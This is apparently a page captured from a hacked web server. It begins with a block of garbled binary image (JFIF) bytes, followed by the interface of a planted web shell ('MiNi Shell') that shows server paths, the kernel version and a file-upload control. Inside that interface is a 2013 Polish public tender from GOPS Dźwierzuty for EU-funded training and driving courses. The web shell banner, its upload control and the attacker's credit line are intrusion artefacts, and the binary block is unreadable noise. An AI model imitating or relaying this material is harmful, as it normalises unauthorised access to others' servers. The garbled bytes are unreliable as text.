JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130305/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130305/33913-N-2013.html

<p class="kh_header"><b>Dźwierzuty: Przeprowadzenie usług szkoleniowych i warsztatów dla GOPS w Dźwierzutach w ramach projektu -Od bierności do aktywności</b><br>
<b>Numer ogłoszenia: 33913 - 2013; data zamieszczenia: 05.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej , ul. Niepodległości 6, 12-120 Dźwierzuty, woj. warmińsko-mazurskie, tel. 89 621 04 03, 621 04 05, faks 89 621 04 05.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.gminadzwierzuty.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie usług szkoleniowych i warsztatów dla GOPS w Dźwierzutach w ramach projektu -Od bierności do aktywności.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1. Przedmiotem zamówienia jest: Przeprowadzenie usług szkoleniowych i warsztatów w zakresie tematyki przedstawionej w częściach 1i 2 niniejszego opisu przedmiotu zamówienia.                                         Zadanie realizowane w  ramach Programu Operacyjnego Kapitał Ludzki;  PRIORYTET VII Promocja integracji społecznej DZIAŁANIE 7.1 Rozwój i upowszechnianie aktywnej integracji PODDZIAŁANIE 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej, dofinansowanego ze środków Europejskiego Funduszu Społecznego.
 
3.2. Szczegółowy opis przedmiotu zamówienia obejmuje 2 części:
Część 1
1)  Warsztaty psychospołeczne dla 16 osób skierowanych przez  Ośrodek Pomocy Społecznej w Dźwierzutach. Warsztaty odbywać się będą w 1 grupie 16 osób. 
Program szkolenia - 15 godzin zajęć grupowych przez okres 3 dni - spotkanie 5 godzin jednorazowo. Program warsztatów winien zawierać co najmniej takie zagadnienia jak: interakcje personalne - mocne i słabe strony, komunikacja, funkcjonowanie w grupie, konflikty, wzmocnienie samooceny. 
Załącznikiem do umowy będzie harmonogram godzinowy zajęć grupowych. 
Termin realizacji zajęć: lipiec, sierpień 2013 r. 
Zamawiający dysponuje salą na terenie Dźwierzut. Wykonawca zapewnia catering.

2) Kurs ogólnobudowlany  dla  5 osób skierowanych przez Ośrodek Pomocy Społecznej w Dźwierzutach. Program szkolenia - 140 godzin zajęć grupowych w tym 100 godzin zajęć praktycznych. 
Załącznikiem do umowy będzie harmonogram godzinowy zajęć grupowych.                                                 Termin realizacji zajęć:  kwiecień, maj 2013 r. Zajęcia mogą odbywać się w Dźwierzutach lub Szczytnie. Wykonawca musi dysponować salą, zapewnia catering oraz zwraca koszty dojazdu uczestników.

3) Kurs opiekunki medycznej z elementami masażu dla 7 osób skierowanych przez Ośrodek Pomocy Społecznej w Dźwierzutach . Program szkolenia - 200 godzin zajęć grupowych w tym 100 godzin zajęć praktycznych.
Załącznikiem do umowy będzie harmonogram godzinowy zajęć grupowych.  
Termin realizacji zajęć: kwiecień, maj  2013 r. Zajęcia mogą odbywać się w Dźwierzutach lub Szczytnie. Wykonawca musi dysponować salą, zapewnia catering oraz zwraca koszty dojazdu uczestników.

4) Kurs magazynier-sprzedawca z obsługą komputera, kasy fiskalnej i wózka jezdniowego.                                Dla 11 osób skierowanych przez Ośrodek Pomocy Społecznej w Dźwierzutach. 
Program szkolenia - 140 godzin zajęć grupowych.
Załącznikiem do umowy będzie harmonogram godzinowy zajęć grupowych.                   
Termin realizacji zajęć: czerwiec 2013 r. Zajęcia mogą odbywać się w Dźwierzutach lub Szczytnie. Wykonawca musi dysponować salą, zapewnia catering oraz zwraca koszty dojazdu uczestników.

5) Doradztwo zawodowe dla 16 osób skierowanych przez Ośrodek Pomocy Społecznej w Dźwierzutach.   Warsztaty odbywać się będą w 1 grupie 16 osób. Program warsztatów winien zawierać co najmniej takie zagadnienia jak: techniki aktywnego poszukiwania pracy, przygotowanie dokumentacji aplikacyjnych oraz techniki autoprezentacji.
Termin realizacji doradztwa: 8-10 kwietnia 2013r. Zamawiający dysponuje salą na terenie Dźwierzut. Wykonawca zapewnia catering.

Część 2
Kurs prawa jazdy kat B dla 11 osób skierowanych przez Ośrodek Pomocy Społecznej w Dźwierzutach.                                                                                                                                                  Program szkolenia - 60 godzin zajęć ( 30 godzin teoria i 30 godzin jazdy) Zamawiający wymaga przeprowadzenia minimum 10 godzin jazdy w miejscowości w której będzie odbywać się egzamin.                      W koszty kursu należy wliczyć wszystkie opłaty włącznie z badaniami lekarskimi, opłatą za profil kandydata na kierowcę i opłatą za egzamin.                                                                                                                                                           Załącznikiem do umowy będzie harmonogram godzinowy zajęć grupowych. 
Termin realizacji zajęć: wrzesień, październik, listopad 2013 r.
Wykonawca musi dysponować salą, zapewnia catering oraz zwraca koszty dojazdu uczestników.
Przeprowadzenie kursu prawa jazdy kat. B  musi być  zgodne z obowiązującymi w tym zakresie przepisami Rozporządzenia Ministra Infrastruktury z dnia 27.10.2005r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz.U. z 2009 r. Nr 78 poz.653 z późniejszymi zmianami).

3.3. Zamówienie jest finansowane ze środków Europejskiego Funduszu Społecznego. Wykonawca zobowiązany jest umieszczać informacje o realizowaniu szkolenia/warsztatu finansowanego z funduszy europejskich na wszystkich dokumentach związanych z przedmiotem zamówienia takich jak: harmonogram , zaświadczenia o ukończeniu szkolenia, warsztatu, certyfikaty, dyplomy, listy obecności, ankiety. Materiały jak i miejsce szkolenia powinno być oznaczone zgodnie z wytycznymi dotyczącymi logotypów dla projektów w ramach POKL. Godzina szkolenia/warsztatu liczy 60 minut i obejmuje zajęcia edukacyjne liczące 45 min. oraz przerwę, liczącą średnio 15 minut - długość przerw jest ustalana w sposób elastyczny przez Wykonawcę. Każde szkolenie/warsztat musi być realizowany wg przedłożonego wraz z ofertą programu. 
Zajęcia powinny być prowadzone od poniedziałku do piątku. 
Wykonawca musi zapewnić i rozdać każdemu uczestnikowi szkolenia/warsztatu za potwierdzeniem otrzymania (listy z podpisami ):
- Certyfikat lub świadectwo uczestnictwa w szkoleniu/warsztatach
- ankiety wstępne
- ankiety końcowe
- materiały szkoleniowe
Wykonawca zapewnia dla Zamawiającego 1 komplet materiałów szkoleniowych i kopie certyfikatów lub świadectw uczestnictwa w szkoleniach/warsztatach. 
Materiały biurowe i dydaktyczne, w przypadku szkoleń finansowanych z funduszy europejskich, muszą być oznakowane. Wszystkie te materiały muszą być przygotowane i rozdane uczestnikom szkolenia najpóźniej w pierwszym dniu zajęć. Uczestnicy kwitują odbiór materiałów oraz potwierdzają odbiór posiłku własnoręcznym podpisem. Oryginał tego pokwitowania Zamawiający otrzyma od Wykonawcy po zakończeniu zajęć, razem z innymi materiałami niezbędnymi do rozliczenia całej usługi. Osoby kierowane na szkolenia będą do dyspozycji w okresie od dnia podpisania umowy do dnia zakończenia zajęć zgodnie z zatwierdzonym harmonogramem. 
3.4. Wykonawca w ramach usługi zobowiązany jest do:
1) informowania przed każdymi zajęciami uczestników o współfinansowaniu kursu ze środków
Unii Europejskiej w ramach Europejskiego Funduszu Społecznego,                                                                     2) niezwłocznego informowania Zamawiającego o nieobecności któregokolwiek uczestnika,
przerwaniu lub rezygnacji przez uczestnika z kursu oraz innych sytuacjach mających wpływ
na prawidłowy przebieg kursu i realizację umowy,
3) prowadzenia dokumentacji zajęć w tym : dziennika zajęć, list obecności uczestników kursu, list potwierdzających korzystanie uczestników kursu z cateringu, listy potwierdzającej odbiór materiałów dydaktycznych i piśmienniczych, list potwierdzających odbiór zaświadczeń o ukończeniu kursu.
Dla części 2 sprawozdanie z przebiegu kursu na prawo jazdy.
4) prowadzenia zajęć zgodnie z przepisami bhp w tym zakresie,
3.5.Zamawiający zastrzega sobie możliwość zmniejszenia liczby uczestników poszczególnych
kursów wyłącznie z powodu zdarzeń losowych, których nie można było wcześniej
przewidzieć lub w przypadku uzasadnionej rezygnacji uczestnika i braku możliwości
zastąpienia innym uczestnikiem. W takim wypadku, Wykonawcy będzie przysługiwać tylko
wynagrodzenie za faktycznie przeszkoloną liczbę osób i nie będzie on zgłaszać z tego tytułu
żadnych roszczeń do Zamawiającego.
3.6. Wykonawca zapewni możliwość wglądu przez Zamawiającego do prowadzonej w ramach
zajęć dokumentacji oraz umożliwi Zamawiającemu wizytację zajęć (bez uzgodnienia
z Wykonawcą terminu wizytacji) w tym wykonania dokumentacji fotograficznej na potrzeby
dokumentacyjne projektu.
3.7. Rozliczenie pomiędzy Zamawiającym, a Wykonawcą nastąpi po ukończeniu kursu przez
wszystkich wskazanych przez Zamawiającego uczestników, wypełnienia postanowień umowy i przekazania Zamawiającemu w ciągu 5 dni, licząc od dnia zakończenia szkolenia
całej wymaganej dokumentacji w tym:
- dziennika zajęć,
- ankiet ewaluacyjnych uczestników kursu,
- list obecności uczestników kursu,
- list potwierdzających korzystanie uczestników kursu z cateringu,
- listy potwierdzającej odbiór przez uczestników kursu materiałów dydaktycznych i piśmienniczych,
- kopii, poświadczonych za zgodność z oryginałem sporządzonych ocen nabytych umiejętności lub w przypadku kursu kończącego się egzaminem protokołu egzaminacyjnego,
- kopii, poświadczonych za zgodność z oryginałem zaświadczeń  wraz z imienną listą potwierdzającą ich odbiór,.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.41.10.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>:  Zamawiający uzna spełnienie w/w warunku jeśli Wykonawca wykaże, że jest instytucją szkoleniową w rozumieniu ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudniania i instytucjach rynku pracy (tj. Dz. U. 2008 r. Nr 69, poz. 415 ze zm.) tj. posiada aktualny wpis do rejestru instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej a w przypadku gdy wpis został dokonany przed rokiem 2013 również potwierdzenie na rok bieżący.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeśli Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie zorganizował i przeprowadził a w przypadku świadczeń okresowych lub ciągłych organizuje i przeprowadza co najmniej: 
Dla części 1: 3 usługi szkoleniowe w zakresie wybranych rodzajów zajęć z wymienionych pięciu w cz 1  wraz z załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane należycie. W tym 2 szkolenia /warsztaty w ramach Programu Operacyjnego Kapitał  Ludzki.
Dla części 2: 3 usługi szkoleniowe w zakresie nauki jazdy, wraz z załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane należycie. W tym 2 szkolenia w ramach Programu Operacyjnego Kapitał  Ludzki</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>:  
a) Wykonawca będzie dysponował urządzeniami technicznymi w celu realizacji odpowiednio danej części zamówienia tj. salą na terenie Dźwierzuty lub Szczytna wyposażoną w odpowiedni sprzęt, natomiast dla części 2 dodatkowo  min. 3 samochody ( z podaniem marki i nr rejestracyjnego) do przeprowadzenia nauki jazdy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeśli;Wykonawca będzie dysponował osobami zdolnymi do wykonania zamówienia. Dla każdego rodzaju zajęć będzie dysponował co najmniej jedną osobą posiadającą odpowiednie wykształcenie, uprawnienia i 2-letnie osobiste doświadczenie zawodowe przy realizacji szkoleń/warsztatów objętych tym postępowaniem.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie ma wymagań</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>10.1. Wypełniony we wszystkich pozycjach formularz ofertowy -  załącznik Nr 1 do SIWZ
10.2. Dokument pełnomocnictwa - ( oryginał lub notarialnie poświadczona kopia ) do podpisania oferty, jeżeli oferta nie została podpisana przez osoby upoważnione do tych czynności dokumentem rejestracyjnym, również w przypadku złożenia oferty przez wykonawców ubiegających się o zamówienie wspólnie ( np. konsorcjum, sp. cywilna ), pełnomocnictwo powinno jednoznacznie określać zakres umocowania i wskazywać osobę pełnomocnika. W przypadku podmiotów występujących wspólnie w dokumencie pełnomocnictwa należy wskazać wszystkich wykonawców, którzy wspólnie ubiegają się o udzielenie zamówienia, a każdy z nich powinien podpisać się pod tym dokumentem.
10.3.Program szkolenia/warsztatu dla każdych zajęć oddzielnie opracowany przez Wykonawcę</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>20.1.1. zmiany podwykonawcy za zgodą zamawiającego, -nowy podwykonawca musi spełniać takie same warunki jak podwykonawca pierwotny,
20.1.2. konieczności wykonania części usług innymi sposobami niż założono, na warunkach które nie powodują zmiany wynagrodzenia umownego,
20.1.3. zmian wprowadzanych przez zamawiającego nie wykraczających poza przedmiot zamówienia a dotyczących ilości osób szkolonych, miejsca szkolenia, i innych nieistotnych zmian powstałych wskutek okoliczności niemożliwych wcześniej do przewidzenia;
20.1.4. zmiany terminu realizacji szkoleń z przyczyn leżących po stronie Zamawiającego                                                                                           20.1.5. wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy,
20.1.6. wystąpienia konieczności wprowadzenia zmian w realizacji przedmiotu umowy poprzez: przesunięcie w czasie, uszczegółowienie, lub inna zmiana spowodowana obiektywnymi czynnikami, niezależnymi od Wykonawcy, uniemożliwiającymi realizację przedmiotu umowy zgodnie z pierwotnymi założeniami,
20.1.7. wystąpienia konieczności wprowadzenia zmian spowodowanych następującymi okolicznościami:
20.1.7.1. siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z opisem przedmiotu zamówienia,
20.1.7.2. zmiany danych teleadresowych,
20.1.7.3. rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.gminadzwierzuty.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> GOPS 12-120 Dźwierzuty ul. Niepodległości 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.03.2013 godzina 10:30, miejsce: GOPS 12-120 Dźwierzuty ul. Niepodległości 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie realizowane w  ramach Programu Operacyjnego Kapitał Ludzki;  PRIORYTET VII Promocja integracji społecznej DZIAŁANIE 7.1 Rozwój i upowszechnianie aktywnej integracji PODDZIAŁANIE 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej, dofinansowanego ze środków Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com